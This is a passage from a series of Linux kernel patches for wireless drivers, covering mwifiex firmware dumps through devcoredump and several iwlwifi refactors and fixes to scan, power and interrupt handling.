adapter->drv_info_size); + fw_dump_ptr += adapter->drv_info_size; + strcpy(fw_dump_ptr, "\n========End dump========\n"); + fw_dump_ptr += strlen("\n========End dump========\n"); + + for (idx = 0; idx < adapter->num_mem_types; idx++) { + struct memory_type_mapping *entry = + &adapter->mem_type_mapping_tbl[idx]; + + if (entry->mem_ptr) { + strcpy(fw_dump_ptr, "========Start dump "); + fw_dump_ptr += strlen("========Start dump "); + + strcpy(fw_dump_ptr, entry->mem_name); + fw_dump_ptr += strlen(entry->mem_name); + + strcpy(fw_dump_ptr, "========\n"); + fw_dump_ptr += strlen("========\n"); + + memcpy(fw_dump_ptr, entry->mem_ptr, entry->mem_size); + fw_dump_ptr += entry->mem_size; + + strcpy(fw_dump_ptr, "\n========End dump========\n"); + fw_dump_ptr += strlen("\n========End dump========\n"); + } + } + + /* device dump data will be free in device coredump release function + * after 5 min + */ + dev_coredumpv(adapter->dev, dump_data, dump_len, GFP_KERNEL); + mwifiex_dbg(adapter, MSG, + "== mwifiex dump information to /sys/class/devcoredump end"); + +done: + for (idx = 0; idx < adapter->num_mem_types; idx++) { + struct memory_type_mapping *entry = + &adapter->mem_type_mapping_tbl[idx]; + + if (entry->mem_ptr) { + vfree(entry->mem_ptr); + entry->mem_ptr = NULL; + } + entry->mem_size = 0; + } + + if (adapter->drv_info_dump) { + vfree(adapter->drv_info_dump); + adapter->drv_info_dump = NULL; + adapter->drv_info_size = 0; + } +} +EXPORT_SYMBOL_GPL(mwifiex_upload_device_dump); + /* * CFG802.11 network device handler for statistics retrieval. */ diff --git a/drivers/net/wireless/mwifiex/main.h b/drivers/net/wireless/mwifiex/main.h index 01111fe72a43..5a6c1c76b33b 100644 --- a/drivers/net/wireless/mwifiex/main.h +++ b/drivers/net/wireless/mwifiex/main.h @@ -36,6 +36,7 @@ #include #include #include +#include #include "decl.h" #include "ioctl.h" @@ -950,7 +951,6 @@ struct mwifiex_adapter { u8 key_api_major_ver, key_api_minor_ver; struct memory_type_mapping *mem_type_mapping_tbl; u8 num_mem_types; - u8 curr_mem_idx; void *drv_info_dump; u32 drv_info_size; bool scan_chan_gap_enabled; @@ -1485,6 +1485,7 @@ u8 mwifiex_adjust_data_rate(struct mwifiex_private *priv, u8 rx_rate, u8 ht_info); void mwifiex_drv_info_dump(struct mwifiex_adapter *adapter); +void mwifiex_upload_device_dump(struct mwifiex_adapter *adapter); void *mwifiex_alloc_dma_align_buf(int rx_len, gfp_t flags); void mwifiex_queue_main_work(struct mwifiex_adapter *adapter); diff --git a/drivers/net/wireless/mwifiex/pcie.c b/drivers/net/wireless/mwifiex/pcie.c index 3a9936843c21..77b9055a2d14 100644 --- a/drivers/net/wireless/mwifiex/pcie.c +++ b/drivers/net/wireless/mwifiex/pcie.c @@ -2314,7 +2314,6 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) enum rdwr_status stat; u32 memory_size; int ret; - static char *env[] = { "DRIVER=mwifiex_pcie", "EVENT=fw_dump", NULL }; if (!card->pcie.can_dump_fw) return; @@ -2334,7 +2333,7 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) /* Read the number of the memories which will dump */ stat = mwifiex_pcie_rdwr_firmware(adapter, doneflag); if (stat == RDWR_STATUS_FAILURE) - goto done; + return; reg = creg->fw_dump_start; mwifiex_read_reg_byte(adapter, reg, &dump_num); @@ -2345,7 +2344,7 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) stat = mwifiex_pcie_rdwr_firmware(adapter, doneflag); if (stat == RDWR_STATUS_FAILURE) - goto done; + return; memory_size = 0; reg = creg->fw_dump_start; @@ -2361,7 +2360,7 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) FW_DUMP_READ_DONE); if (ret) { mwifiex_dbg(adapter, ERROR, "PCIE write err\n"); - goto done; + return; } break; } @@ -2373,7 +2372,7 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) if (!entry->mem_ptr) { mwifiex_dbg(adapter, ERROR, "Vmalloc %s failed\n", entry->mem_name); - goto done; + return; } dbg_ptr = entry->mem_ptr; end_ptr = dbg_ptr + memory_size; @@ -2385,7 +2384,7 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) do { stat = mwifiex_pcie_rdwr_firmware(adapter, doneflag); if (RDWR_STATUS_FAILURE == stat) - goto done; + return; reg_start = creg->fw_dump_start; reg_end = creg->fw_dump_end; @@ -2396,7 +2395,7 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) } else { mwifiex_dbg(adapter, ERROR, "Allocated buf not enough\n"); - goto done; + return; } } @@ -2409,18 +2408,14 @@ static void mwifiex_pcie_fw_dump(struct mwifiex_adapter *adapter) break; } while (true); } - mwifiex_dbg(adapter, MSG, "== mwifiex firmware dump end ==\n"); - - kobject_uevent_env(&adapter->wiphy->dev.kobj, KOBJ_CHANGE, env); - -done: - adapter->curr_mem_idx = 0; + mwifiex_dbg(adapter, DUMP, "== mwifiex firmware dump end ==\n"); } static void mwifiex_pcie_device_dump_work(struct mwifiex_adapter *adapter) { mwifiex_drv_info_dump(adapter); mwifiex_pcie_fw_dump(adapter); + mwifiex_upload_device_dump(adapter); } static unsigned long iface_work_flags; diff --git a/drivers/net/wireless/mwifiex/sdio.c b/drivers/net/wireless/mwifiex/sdio.c index 1f32c0214c82..a0b121f3460c 100644 --- a/drivers/net/wireless/mwifiex/sdio.c +++ b/drivers/net/wireless/mwifiex/sdio.c @@ -2185,7 +2185,6 @@ static void mwifiex_sdio_fw_dump(struct mwifiex_adapter *adapter) u8 *dbg_ptr, *end_ptr, dump_num, idx, i, read_reg, doneflag = 0; enum rdwr_status stat; u32 memory_size; - static char *env[] = { "DRIVER=mwifiex_sdio", "EVENT=fw_dump", NULL }; if (!card->can_dump_fw) return; @@ -2297,17 +2296,15 @@ static void mwifiex_sdio_fw_dump(struct mwifiex_adapter *adapter) } mwifiex_dbg(adapter, MSG, "== mwifiex firmware dump end ==\n"); - kobject_uevent_env(&adapter->wiphy->dev.kobj, KOBJ_CHANGE, env); - done: sdio_release_host(card->func); - adapter->curr_mem_idx = 0; } static void mwifiex_sdio_device_dump_work(struct mwifiex_adapter *adapter) { mwifiex_drv_info_dump(adapter); mwifiex_sdio_fw_dump(adapter); + mwifiex_upload_device_dump(adapter); } static void mwifiex_sdio_work(struct work_struct *work) From fa2ab6971844141add8d98a73a0a9679f9067bb5 Mon Sep 17 00:00:00 2001 From: Shailendra Verma Date: Wed, 27 May 2015 06:25:57 +0530 Subject: [PATCH 621/872] ray_cs: Change 1 to true for bool type variable. The variable translate is bool type. So assigning true instead of 1. Signed-off-by: Shailendra Verma Signed-off-by: Kalle Valo --- drivers/net/wireless/ray_cs.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/wireless/ray_cs.c b/drivers/net/wireless/ray_cs.c index 477f86354dc5..0881ba8535f4 100644 --- a/drivers/net/wireless/ray_cs.c +++ b/drivers/net/wireless/ray_cs.c @@ -143,7 +143,7 @@ static int psm; static char *essid; /* Default to encapsulation unless translation requested */ -static bool translate = 1; +static bool translate = true; static int country = USA; From bb8f44c919309eb638e26e6d5e6b5d1fae8d6748 Mon Sep 17 00:00:00 2001 From: Eyal Shapira Date: Wed, 27 May 2015 22:00:03 +0300 Subject: [PATCH 622/872] iwlwifi: mvm: rs: pass rate directly to column checks A minor refactoring for following patches. This enables the reuse of the checks functions. type=cleanup Signed-off-by: Eyal Shapira Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/rs.c | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/rs.c b/drivers/net/wireless/iwlwifi/mvm/rs.c index 1295178abfae..ae9965647771 100644 --- a/drivers/net/wireless/iwlwifi/mvm/rs.c +++ b/drivers/net/wireless/iwlwifi/mvm/rs.c @@ -138,7 +138,7 @@ struct rs_tx_column; typedef bool (*allow_column_func_t) (struct iwl_mvm *mvm, struct ieee80211_sta *sta, - struct iwl_scale_tbl_info *tbl, + struct rs_rate *rate, const struct rs_tx_column *next_col); struct rs_tx_column { @@ -150,14 +150,14 @@ struct rs_tx_column { }; static bool rs_ant_allow(struct iwl_mvm *mvm, struct ieee80211_sta *sta, - struct iwl_scale_tbl_info *tbl, + struct rs_rate *rate, const struct rs_tx_column *next_col) { return iwl_mvm_bt_coex_is_ant_avail(mvm, next_col->ant); } static bool rs_mimo_allow(struct iwl_mvm *mvm, struct ieee80211_sta *sta, - struct iwl_scale_tbl_info *tbl, + struct rs_rate *rate, const struct rs_tx_column *next_col) { struct iwl_mvm_sta *mvmsta; @@ -187,7 +187,7 @@ static bool rs_mimo_allow(struct iwl_mvm *mvm, struct ieee80211_sta *sta, } static bool rs_siso_allow(struct iwl_mvm *mvm, struct ieee80211_sta *sta, - struct iwl_scale_tbl_info *tbl, + struct rs_rate *rate, const struct rs_tx_column *next_col) { if (!sta->ht_cap.ht_supported) @@ -197,10 +197,9 @@ static bool rs_siso_allow(struct iwl_mvm *mvm, struct ieee80211_sta *sta, } static bool rs_sgi_allow(struct iwl_mvm *mvm, struct ieee80211_sta *sta, - struct iwl_scale_tbl_info *tbl, + struct rs_rate *rate, const struct rs_tx_column *next_col) { - struct rs_rate *rate = &tbl->rate; struct ieee80211_sta_ht_cap *ht_cap = &sta->ht_cap; struct ieee80211_sta_vht_cap *vht_cap = &sta->vht_cap; @@ -1659,7 +1658,8 @@ static enum rs_column rs_get_next_column(struct iwl_mvm *mvm, for (j = 0; j < MAX_COLUMN_CHECKS; j++) { allow_func = next_col->checks[j]; - if (allow_func && !allow_func(mvm, sta, tbl, next_col)) + if (allow_func && !allow_func(mvm, sta, &tbl->rate, + next_col)) break; } From 6a8ac59c80d74df0a6e2280ebec77b307d8c077a Mon Sep 17 00:00:00 2001 From: Liad Kaufman Date: Tue, 19 May 2015 13:47:03 +0300 Subject: [PATCH 623/872] iwlwifi: wrt: add mipi type to debug types This adds the MIPI mode type to the types declared supported by the driver. Without this patch, when using MIPI mode and looking at the logs the user would see the debug destination "UNKNOWN". Signed-off-by: Liad Kaufman Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-fw-file.h | 2 ++ drivers/net/wireless/iwlwifi/iwl-fw.h | 4 +++- 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-fw-file.h b/drivers/net/wireless/iwlwifi/iwl-fw-file.h index a8d0b6423f7c..5b7c0ae52f93 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw-file.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw-file.h @@ -427,11 +427,13 @@ struct iwl_fw_dbg_reg_op { * @SMEM_MODE: monitor stores the data in SMEM * @EXTERNAL_MODE: monitor stores the data in allocated DRAM * @MARBH_MODE: monitor stores the data in MARBH buffer + * @MIPI_MODE: monitor outputs the data through the MIPI interface */ enum iwl_fw_dbg_monitor_mode { SMEM_MODE = 0, EXTERNAL_MODE = 1, MARBH_MODE = 2, + MIPI_MODE = 3, }; /** diff --git a/drivers/net/wireless/iwlwifi/iwl-fw.h b/drivers/net/wireless/iwlwifi/iwl-fw.h index cf75bafae51d..cdc7f1edaed9 100644 --- a/drivers/net/wireless/iwlwifi/iwl-fw.h +++ b/drivers/net/wireless/iwlwifi/iwl-fw.h @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2008 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -205,6 +205,8 @@ static inline const char *get_fw_dbg_mode_string(int mode) return "EXTERNAL_DRAM"; case MARBH_MODE: return "MARBH"; + case MIPI_MODE: + return "MIPI"; default: return "UNKNOWN"; } From 95411d0455cc522c9f5176d37940a311e0241c42 Mon Sep 17 00:00:00 2001 From: Avri Altman Date: Mon, 11 May 2015 11:04:34 +0300 Subject: [PATCH 624/872] iwlwifi: pcie: Control access to the NIC's PM registers via iwl_cfg Allow a cleaner way to access those hw-dependent registers, instead of using the product family type etc. Signed-off-by: Avri Altman Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-8000.c | 3 ++- drivers/net/wireless/iwlwifi/iwl-config.h | 1 + drivers/net/wireless/iwlwifi/mvm/ops.c | 2 +- drivers/net/wireless/iwlwifi/pcie/rx.c | 1 + drivers/net/wireless/iwlwifi/pcie/trans.c | 16 ++++++++-------- 5 files changed, 13 insertions(+), 10 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-8000.c b/drivers/net/wireless/iwlwifi/iwl-8000.c index 5dca838a3e8b..5c08f7035b4f 100644 --- a/drivers/net/wireless/iwlwifi/iwl-8000.c +++ b/drivers/net/wireless/iwlwifi/iwl-8000.c @@ -163,7 +163,8 @@ static const struct iwl_tt_params iwl8000_tt_params = { .smem_len = IWL8260_SMEM_LEN, \ .default_nvm_file_B_step = DEFAULT_NVM_FILE_FAMILY_8000B, \ .default_nvm_file_C_step = DEFAULT_NVM_FILE_FAMILY_8000C, \ - .thermal_params = &iwl8000_tt_params + .thermal_params = &iwl8000_tt_params, \ + .apmg_not_supported = true const struct iwl_cfg iwl8260_2n_cfg = { .name = "Intel(R) Dual Band Wireless N 8260", diff --git a/drivers/net/wireless/iwlwifi/iwl-config.h b/drivers/net/wireless/iwlwifi/iwl-config.h index 225b6d6b8573..08c14afeb148 100644 --- a/drivers/net/wireless/iwlwifi/iwl-config.h +++ b/drivers/net/wireless/iwlwifi/iwl-config.h @@ -360,6 +360,7 @@ struct iwl_cfg { const u32 smem_offset; const u32 smem_len; const struct iwl_tt_params *thermal_params; + bool apmg_not_supported; }; /* diff --git a/drivers/net/wireless/iwlwifi/mvm/ops.c b/drivers/net/wireless/iwlwifi/mvm/ops.c index 690b33677510..91ca626704e3 100644 --- a/drivers/net/wireless/iwlwifi/mvm/ops.c +++ b/drivers/net/wireless/iwlwifi/mvm/ops.c @@ -194,7 +194,7 @@ static void iwl_mvm_nic_config(struct iwl_op_mode *op_mode) * (PCIe power is lost before PERST# is asserted), causing ME FW * to lose ownership and not being able to obtain it back. */ - if (mvm->trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) + if (!mvm->trans->cfg->apmg_not_supported) iwl_set_bits_mask_prph(mvm->trans, APMG_PS_CTRL_REG, APMG_PS_CTRL_EARLY_PWR_OFF_RESET_DIS, ~APMG_PS_CTRL_EARLY_PWR_OFF_RESET_DIS); diff --git a/drivers/net/wireless/iwlwifi/pcie/rx.c b/drivers/net/wireless/iwlwifi/pcie/rx.c index 7ff69c642103..adad8d0fae7f 100644 --- a/drivers/net/wireless/iwlwifi/pcie/rx.c +++ b/drivers/net/wireless/iwlwifi/pcie/rx.c @@ -775,6 +775,7 @@ static void iwl_pcie_irq_handle_error(struct iwl_trans *trans) /* W/A for WiFi/WiMAX coex and WiMAX own the RF */ if (trans->cfg->internal_wimax_coex && + !trans->cfg->apmg_not_supported && (!(iwl_read_prph(trans, APMG_CLK_CTRL_REG) & APMS_CLK_VAL_MRB_FUNC_MODE) || (iwl_read_prph(trans, APMG_PS_CTRL_REG) & diff --git a/drivers/net/wireless/iwlwifi/pcie/trans.c b/drivers/net/wireless/iwlwifi/pcie/trans.c index a341ed90f8a8..dd1b90b04763 100644 --- a/drivers/net/wireless/iwlwifi/pcie/trans.c +++ b/drivers/net/wireless/iwlwifi/pcie/trans.c @@ -182,6 +182,9 @@ static void iwl_trans_pcie_write_shr(struct iwl_trans *trans, u32 reg, u32 val) static void iwl_pcie_set_pwr(struct iwl_trans *trans, bool vaux) { + if (!trans->cfg->apmg_not_supported) + return; + if (vaux && pci_pme_capable(to_pci_dev(trans->dev), PCI_D3cold)) iwl_set_bits_mask_prph(trans, APMG_PS_CTRL_REG, APMG_PS_CTRL_VAL_PWR_SRC_VAUX, @@ -315,7 +318,7 @@ static int iwl_pcie_apm_init(struct iwl_trans *trans) * bits do not disable clocks. This preserves any hardware * bits already set by default in "CLK_CTRL_REG" after reset. */ - if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) { + if (!trans->cfg->apmg_not_supported) { iwl_write_prph(trans, APMG_CLK_EN_REG, APMG_CLK_VAL_DMA_CLK_RQT); udelay(20); @@ -515,8 +518,7 @@ static int iwl_pcie_nic_init(struct iwl_trans *trans) spin_unlock(&trans_pcie->irq_lock); - if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) - iwl_pcie_set_pwr(trans, false); + iwl_pcie_set_pwr(trans, false); iwl_op_mode_nic_config(trans->op_mode); @@ -1063,7 +1065,7 @@ static void iwl_trans_pcie_stop_device(struct iwl_trans *trans, bool low_power) iwl_pcie_rx_stop(trans); /* Power-down device's busmaster DMA clocks */ - if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) { + if (!trans->cfg->apmg_not_supported) { iwl_write_prph(trans, APMG_CLK_DIS_REG, APMG_CLK_VAL_DMA_CLK_RQT); udelay(5); @@ -1160,8 +1162,7 @@ static void iwl_trans_pcie_d3_suspend(struct iwl_trans *trans, bool test) */ iwl_trans_pcie_tx_reset(trans); - if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) - iwl_pcie_set_pwr(trans, true); + iwl_pcie_set_pwr(trans, true); } static int iwl_trans_pcie_d3_resume(struct iwl_trans *trans, @@ -1199,8 +1200,7 @@ static int iwl_trans_pcie_d3_resume(struct iwl_trans *trans, return ret; } - if (trans->cfg->device_family != IWL_DEVICE_FAMILY_8000) - iwl_pcie_set_pwr(trans, false); + iwl_pcie_set_pwr(trans, false); iwl_trans_pcie_tx_reset(trans); From f0bf859304a9444e275530a29d4162978c9e8b81 Mon Sep 17 00:00:00 2001 From: David Spinadel Date: Wed, 20 May 2015 11:56:59 +0300 Subject: [PATCH 625/872] iwlwifi: mvm: add inactive state to ebs status Currently EBS status in scan complete notifications is set to success if EBS wasn't activated. FW will add a special return value for cases when EBS wasn't activated and we add a print of this status. This change is needed for debug only, no behavior changes. Signed-off-by: David Spinadel Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- .../net/wireless/iwlwifi/mvm/fw-api-scan.h | 1 + drivers/net/wireless/iwlwifi/mvm/scan.c | 33 ++++++++++++++----- 2 files changed, 25 insertions(+), 9 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h b/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h index f34cf002e243..5e4cbdb44c60 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h +++ b/drivers/net/wireless/iwlwifi/mvm/fw-api-scan.h @@ -294,6 +294,7 @@ enum iwl_scan_ebs_status { IWL_SCAN_EBS_SUCCESS, IWL_SCAN_EBS_FAILED, IWL_SCAN_EBS_CHAN_NOT_FOUND, + IWL_SCAN_EBS_INACTIVE, }; /** diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 4f4570d5261d..9409237435b6 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -352,6 +352,20 @@ int iwl_mvm_rx_scan_match_found(struct iwl_mvm *mvm, return 0; } +static const char *iwl_mvm_ebs_status_str(enum iwl_scan_ebs_status status) +{ + switch (status) { + case IWL_SCAN_EBS_SUCCESS: + return "successful"; + case IWL_SCAN_EBS_INACTIVE: + return "inactive"; + case IWL_SCAN_EBS_FAILED: + case IWL_SCAN_EBS_CHAN_NOT_FOUND: + default: + return "failed"; + } +} + int iwl_mvm_rx_lmac_scan_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_cmd_buffer *rxb, struct iwl_device_cmd *cmd) @@ -359,7 +373,6 @@ int iwl_mvm_rx_lmac_scan_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_periodic_scan_complete *scan_notif = (void *)pkt->data; bool aborted = (scan_notif->status == IWL_SCAN_OFFLOAD_ABORTED); - bool ebs_successful = (scan_notif->ebs_status == IWL_SCAN_EBS_SUCCESS); /* scan status must be locked for proper checking */ lockdep_assert_held(&mvm->mutex); @@ -379,13 +392,13 @@ int iwl_mvm_rx_lmac_scan_complete_notif(struct iwl_mvm *mvm, IWL_DEBUG_SCAN(mvm, "Scheduled scan %s, EBS status %s\n", aborted ? "aborted" : "completed", - ebs_successful ? "successful" : "failed"); + iwl_mvm_ebs_status_str(scan_notif->ebs_status)); mvm->scan_status &= ~IWL_MVM_SCAN_STOPPING_SCHED; } else if (mvm->scan_status & IWL_MVM_SCAN_STOPPING_REGULAR) { IWL_DEBUG_SCAN(mvm, "Regular scan %s, EBS status %s\n", aborted ? "aborted" : "completed", - ebs_successful ? "successful" : "failed"); + iwl_mvm_ebs_status_str(scan_notif->ebs_status)); mvm->scan_status &= ~IWL_MVM_SCAN_STOPPING_REGULAR; } else if (mvm->scan_status & IWL_MVM_SCAN_SCHED) { @@ -393,14 +406,14 @@ int iwl_mvm_rx_lmac_scan_complete_notif(struct iwl_mvm *mvm, IWL_DEBUG_SCAN(mvm, "Scheduled scan %s, EBS status %s (FW)\n", aborted ? "aborted" : "completed", - ebs_successful ? "successful" : "failed"); + iwl_mvm_ebs_status_str(scan_notif->ebs_status)); mvm->scan_status &= ~IWL_MVM_SCAN_SCHED; ieee80211_sched_scan_stopped(mvm->hw); } else if (mvm->scan_status & IWL_MVM_SCAN_REGULAR) { IWL_DEBUG_SCAN(mvm, "Regular scan %s, EBS status %s (FW)\n", aborted ? "aborted" : "completed", - ebs_successful ? "successful" : "failed"); + iwl_mvm_ebs_status_str(scan_notif->ebs_status)); mvm->scan_status &= ~IWL_MVM_SCAN_REGULAR; ieee80211_scan_completed(mvm->hw, @@ -408,7 +421,9 @@ int iwl_mvm_rx_lmac_scan_complete_notif(struct iwl_mvm *mvm, iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); } - mvm->last_ebs_successful = ebs_successful; + mvm->last_ebs_successful = + scan_notif->ebs_status == IWL_SCAN_EBS_SUCCESS || + scan_notif->ebs_status == IWL_SCAN_EBS_INACTIVE; return 0; } @@ -1376,10 +1391,10 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, uid, mvm->scan_uid_status[uid], notif->status == IWL_SCAN_OFFLOAD_COMPLETED ? "completed" : "aborted", - notif->ebs_status == IWL_SCAN_EBS_SUCCESS ? - "success" : "failed"); + iwl_mvm_ebs_status_str(notif->ebs_status)); - if (notif->ebs_status) + if (notif->ebs_status != IWL_SCAN_EBS_SUCCESS && + notif->ebs_status != IWL_SCAN_EBS_INACTIVE) mvm->last_ebs_successful = false; mvm->scan_uid_status[uid] = 0; From 15286e26d28aa21754510b86edee67a1d6537449 Mon Sep 17 00:00:00 2001 From: David Spinadel Date: Tue, 26 May 2015 10:32:19 +0300 Subject: [PATCH 626/872] iwlwifi: mvm: don't use EBS for P2P find Don't use EBS for P2P find to make sure we find all GOs in our only attempt. Signed-off-by: David Spinadel Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index 9409237435b6..794109e617a1 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -770,19 +770,23 @@ static inline bool iwl_mvm_scan_fits(struct iwl_mvm *mvm, int n_ssids, iwl_mvm_max_scan_ie_fw_cmd_room(mvm))); } -static inline bool iwl_mvm_scan_use_ebs(struct iwl_mvm *mvm, int n_iterations) +static inline bool iwl_mvm_scan_use_ebs(struct iwl_mvm *mvm, + struct ieee80211_vif *vif, + int n_iterations) { const struct iwl_ucode_capabilities *capa = &mvm->fw->ucode_capa; /* We can only use EBS if: * 1. the feature is supported; * 2. the last EBS was successful; - * 3. if only single scan, the single scan EBS API is supported. + * 3. if only single scan, the single scan EBS API is supported; + * 4. it's not a p2p find operation. */ return ((capa->flags & IWL_UCODE_TLV_FLAGS_EBS_SUPPORT) && mvm->last_ebs_successful && (n_iterations > 1 || - (capa->api[0] & IWL_UCODE_TLV_API_SINGLE_SCAN_EBS))); + (capa->api[0] & IWL_UCODE_TLV_API_SINGLE_SCAN_EBS)) && + vif->type != NL80211_IFTYPE_P2P_DEVICE); } static int iwl_mvm_scan_total_iterations(struct iwl_mvm_scan_params *params) @@ -860,7 +864,7 @@ static int iwl_mvm_scan_lmac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, cmd->schedule[1].iterations = params->schedule[1].iterations; cmd->schedule[1].full_scan_mul = params->schedule[1].iterations; - if (iwl_mvm_scan_use_ebs(mvm, n_iterations)) { + if (iwl_mvm_scan_use_ebs(mvm, vif, n_iterations)) { cmd->channel_opt[0].flags = cpu_to_le16(IWL_SCAN_CHANNEL_FLAG_EBS | IWL_SCAN_CHANNEL_FLAG_EBS_ACCURATE | @@ -1102,7 +1106,7 @@ static int iwl_mvm_scan_umac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, cmd->uid = cpu_to_le32(uid); cmd->general_flags = cpu_to_le32(iwl_mvm_scan_umac_flags(mvm, params)); - if (iwl_mvm_scan_use_ebs(mvm, n_iterations)) + if (iwl_mvm_scan_use_ebs(mvm, vif, n_iterations)) cmd->channel_flags = IWL_SCAN_CHANNEL_FLAG_EBS | IWL_SCAN_CHANNEL_FLAG_EBS_ACCURATE | IWL_SCAN_CHANNEL_FLAG_CACHE_ADD; From 54154618b5633a2ecb02ba7fe8890c7fec80c404 Mon Sep 17 00:00:00 2001 From: Eliad Peller Date: Thu, 28 May 2015 16:50:12 +0300 Subject: [PATCH 627/872] iwlwifi: pcie: re-enable interrupts on resume On resume, all the interrupts are masked (CSR_INT_MASK is 0), and ict is disabled. Re-configure them both. Signed-off-by: Eliad Peller Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-trans.h | 2 ++ drivers/net/wireless/iwlwifi/mvm/d3.c | 3 ++- drivers/net/wireless/iwlwifi/pcie/drv.c | 17 ++++++++++++++--- 3 files changed, 18 insertions(+), 4 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-trans.h b/drivers/net/wireless/iwlwifi/iwl-trans.h index eb34b94faf03..87a230a7f4b6 100644 --- a/drivers/net/wireless/iwlwifi/iwl-trans.h +++ b/drivers/net/wireless/iwlwifi/iwl-trans.h @@ -641,6 +641,8 @@ struct iwl_trans { enum iwl_d0i3_mode d0i3_mode; + bool wowlan_d0i3; + /* pointer to trans specific struct */ /*Ensure that this pointer will always be aligned to sizeof pointer */ char trans_specific[0] __aligned(sizeof(void *)); diff --git a/drivers/net/wireless/iwlwifi/mvm/d3.c b/drivers/net/wireless/iwlwifi/mvm/d3.c index 423c519f06bc..4165d104e4c3 100644 --- a/drivers/net/wireless/iwlwifi/mvm/d3.c +++ b/drivers/net/wireless/iwlwifi/mvm/d3.c @@ -1170,7 +1170,8 @@ int iwl_mvm_suspend(struct ieee80211_hw *hw, struct cfg80211_wowlan *wowlan) struct iwl_mvm *mvm = IWL_MAC80211_GET_MVM(hw); iwl_trans_suspend(mvm->trans); - if (wowlan->any) { + mvm->trans->wowlan_d0i3 = wowlan->any; + if (mvm->trans->wowlan_d0i3) { /* 'any' trigger means d0i3 usage */ if (mvm->trans->d0i3_mode == IWL_D0I3_MODE_ON_SUSPEND) { int ret = iwl_mvm_enter_d0i3_sync(mvm); diff --git a/drivers/net/wireless/iwlwifi/pcie/drv.c b/drivers/net/wireless/iwlwifi/pcie/drv.c index b18569734922..2ed1e4d2774d 100644 --- a/drivers/net/wireless/iwlwifi/pcie/drv.c +++ b/drivers/net/wireless/iwlwifi/pcie/drv.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2007 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2005 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -629,7 +629,18 @@ static int iwl_pci_resume(struct device *device) if (!trans->op_mode) return 0; - iwl_enable_rfkill_int(trans); + /* + * On suspend, ict is disabled, and the interrupt mask + * gets cleared. Reconfigure them both in case of d0i3 + * image. Otherwise, only enable rfkill interrupt (in + * order to keep track of the rfkill status) + */ + if (trans->wowlan_d0i3) { + iwl_pcie_reset_ict(trans); + iwl_enable_interrupts(trans); + } else { + iwl_enable_rfkill_int(trans); + } hw_rfkill = iwl_is_rfkill_set(trans); iwl_trans_pcie_rf_kill(trans, hw_rfkill); From 5f17570354f91275b0a37a4da33d29a2ab57d32e Mon Sep 17 00:00:00 2001 From: Sara Sharon Date: Tue, 28 Apr 2015 12:56:54 +0300 Subject: [PATCH 628/872] iwlwifi: pcie: New RBD allocation model As a preperation for multiple RX queues change the RBD allocation model. The new model includes a background allocator. The allocator is called by the interrupt handler when there are two released buffers by the queue, and the allocator starts allocating eight pages per request. When the 